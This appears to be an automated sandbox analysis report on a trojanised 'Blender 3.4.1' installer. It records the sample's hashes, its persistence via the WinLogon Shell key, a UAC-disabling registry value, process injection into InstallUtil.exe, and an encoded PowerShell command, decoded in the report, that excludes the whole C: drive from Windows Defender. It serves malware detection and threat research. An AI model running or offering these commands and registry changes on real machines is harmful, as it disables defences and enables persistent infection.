Analysis
max time kernel: 298s
max time network: 315s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02/02/2023, 10:14
Static task: static1
Behavioral task: behavioral1
  Sample: blender-3.4.1-windows-x64.exe
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: blender-3.4.1-windows-x64.exe
  Resource: win10v2004-20220812-en
General
Target: blender-3.4.1-windows-x64.exe
Size: 683.8MB
MD5: aedf8960317a0effcd89c5d816137067
SHA1: 4e074a8e180a9d3248f5fceadf28ea4f7146b33e
SHA256: eeaaa0e20ba43f13e0b62862979abe7f50bb558a812fc4aa729e946fdbe54e98
SHA512: f1e7d861e01ebcc69cad9cceee712885ef1739a84923787bfe7d9e5e9e108b2721b2a1e916e4a33fa947ac84ed6010c1d32fdf0091b3a9ca7f34738a6be6981a
SSDEEP: 3072:mcqqdOyJocZB0O7i4Cg3DILI48p8ERDuwBbEUA:T/dOyJovrg3/ppDuwBYU
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  Description: Set value (str)
  IoC: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Tqhtsdgnsm\\Vcelkcpar.exe\","
  Process: blender-3.4.1-windows-x64.exe
UAC bypass
  Description: Set value (int)
  IoC: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
  Process: InstallUtil.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  Description: Key value queried
  IoC: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation
  Process: blender-3.4.1-windows-x64.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow: 39
  IoC: eth0.me
Suspicious use of SetThreadContext (1 IoC)
  Description: PID 5060 set thread context of 456
  PID: 5060
  Process: blender-3.4.1-windows-x64.exe
  procid_target: 89
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 3536, powershell.exe
  PID 3536, powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, PID 5060, blender-3.4.1-windows-x64.exe
  Token: SeDebugPrivilege, PID 3536, powershell.exe
  Token: SeDebugPrivilege, PID 456, InstallUtil.exe
Suspicious use of WriteProcessMemory (14 IoCs)
  PID 5060 wrote to memory of 3884, blender-3.4.1-windows-x64.exe, procid_target 86
  PID 5060 wrote to memory of 3884, blender-3.4.1-windows-x64.exe, procid_target 86
  PID 5060 wrote to memory of 3884, blender-3.4.1-windows-x64.exe, procid_target 86
  PID 3884 wrote to memory of 3536, cmd.exe, procid_target 88
  PID 3884 wrote to memory of 3536, cmd.exe, procid_target 88
  PID 3884 wrote to memory of 3536, cmd.exe, procid_target 88
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
  PID 5060 wrote to memory of 456, blender-3.4.1-windows-x64.exe, procid_target 89
Processes
C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe (PID 5060, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe"
  - Modifies WinLogon for persistence
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe (PID 3884, depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3536, depth 3)
      Command line: powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
      Decoded -ENC argument (base64 of UTF-16LE text): set-mppreference -exclusionpath C:\ (adds a Windows Defender exclusion covering the whole C: drive)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 456, depth 2)
    Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    - UAC bypass
    - Suspicious use of AdjustPrivilegeToken